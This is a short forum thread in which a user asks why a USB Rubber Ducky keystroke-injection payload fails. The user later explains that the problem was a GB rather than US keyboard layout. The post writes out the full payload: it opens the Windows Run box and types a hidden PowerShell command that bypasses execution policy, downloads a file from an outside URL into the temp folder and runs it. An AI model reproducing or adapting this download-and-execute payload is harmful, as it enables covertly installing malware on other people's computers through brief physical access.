Luseres Posted May 18, 2018 Share Posted May 18, 2018 Hi, I currently have a ducky USB inject.bin encoded with https://ducktoolkit.com/ containing the following code (Modified): DELAY 2000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:/url.org/sub/file.zip',\"$env:temp\file.exe\"); Start-Process \"$env:temp\file.exe\"" ENTER This code is from the GitHub and it should download and execute. When I execute the code manually it works normal. But when I run it from the Ducky USB it doesn't... When its in the Windows Run box I see that after the STRING is typed there are @ @ entered after the string. I think this is the problem and I don't know how I could fix this. Could you please help me. Quote Link to comment Share on other sites More sharing options...
Luseres Posted May 18, 2018 Author Share Posted May 18, 2018 I'm sorry for wasting a post. The problem was keyboard input it was on GB but I needed US Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.